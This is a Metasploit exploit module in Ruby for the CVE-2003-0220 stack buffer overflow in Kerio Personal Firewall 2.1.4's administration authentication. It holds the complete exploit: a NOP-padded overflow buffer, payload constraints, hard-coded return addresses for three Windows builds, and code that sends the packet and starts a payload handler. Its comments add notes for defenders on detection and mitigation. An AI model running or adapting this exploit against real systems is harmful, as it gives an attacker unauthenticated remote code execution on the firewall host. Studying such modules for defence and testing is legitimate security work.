Path: blob/master/modules/exploits/windows/firewall/kerio_auth.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Remote module for the stack buffer overflow in the administration
# authentication handling of Kerio Personal Firewall 2 (CVE-2003-0220,
# OSVDB 6294, BID 7180).
#
# Scope, as stated by the module itself: only tested against 2.1.4, with
# three hard-coded targets, each bound to one Windows release, service
# pack and language. Reliability, stability and side effects are all
# declared unknown.
#
# Notes for defenders and reviewers:
# * The module sends one unauthenticated TCP write of more than 4468 bytes
#   to the administration port (44334 is only this module's default; the
#   deployed port may differ). An oversized first message on that port is
#   the observable to alert on.
# * EXITFUNC defaults to 'process', so the firewall process may terminate
#   afterwards (assumption, not verified here); an unexpected exit of the
#   firewall service is worth correlating with traffic to the admin port.
# * Mitigation is to keep the administration port unreachable from
#   untrusted networks and to retire or upgrade affected installations.
#   Confirm fixed versions against the vendor advisory for the CVE.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata and the default administration port.
  #
  # @param info [Hash] metadata supplied by the framework, merged with the
  #   values below through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Kerio Firewall 2.1.4 Authentication Packet Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in Kerio Personal Firewall
          administration authentication process. This module has only been tested
          against Kerio Personal Firewall 2 (2.1.4).
        },
        'Author' => 'MC',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2003-0220'],
          ['OSVDB', '6294'],
          ['BID', '7180']
        ],
        'DefaultOptions' => { 'EXITFUNC' => 'process' },
        # Payload constraints: at most 800 bytes, no NUL byte, and a fixed
        # six-byte prefix placed ahead of the encoder stub.
        'Payload' => {
          'Space' => 800,
          'BadChars' => "\x00",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff"
        },
        'Platform' => 'win',
        # Each 'Ret' is an absolute address valid only for the named
        # Windows build; other builds are not covered by this module.
        'Targets' => [
          ['Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b }],
          ['Windows XP Pro SP0 English', { 'Ret' => 0x77e3171b }],
          ['Windows XP Pro SP1 English', { 'Ret' => 0x77dc5527 }]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2003-04-28',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([Opt::RPORT(44334)])
  end

  # Connects to the administration port, sends the single oversized
  # authentication message and hands control to the payload handler.
  #
  # No version or banner check precedes the send, so the request goes to
  # whatever service answers on RHOST:RPORT.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # Layout: 4468 bytes of padding, the encoded payload, the per-target
    # 32-bit little-endian return address, then the byte 0xe8 followed by
    # the 32-bit little-endian value -850.
    request = make_nops(4468) + payload.encoded
    request << [target.ret, 0xe8, -850].pack('VCV')

    sock.put(request)
    # Wait up to three seconds for any reply; the data itself is discarded.
    sock.get_once(-1, 3)

    handler
    disconnect
  end
end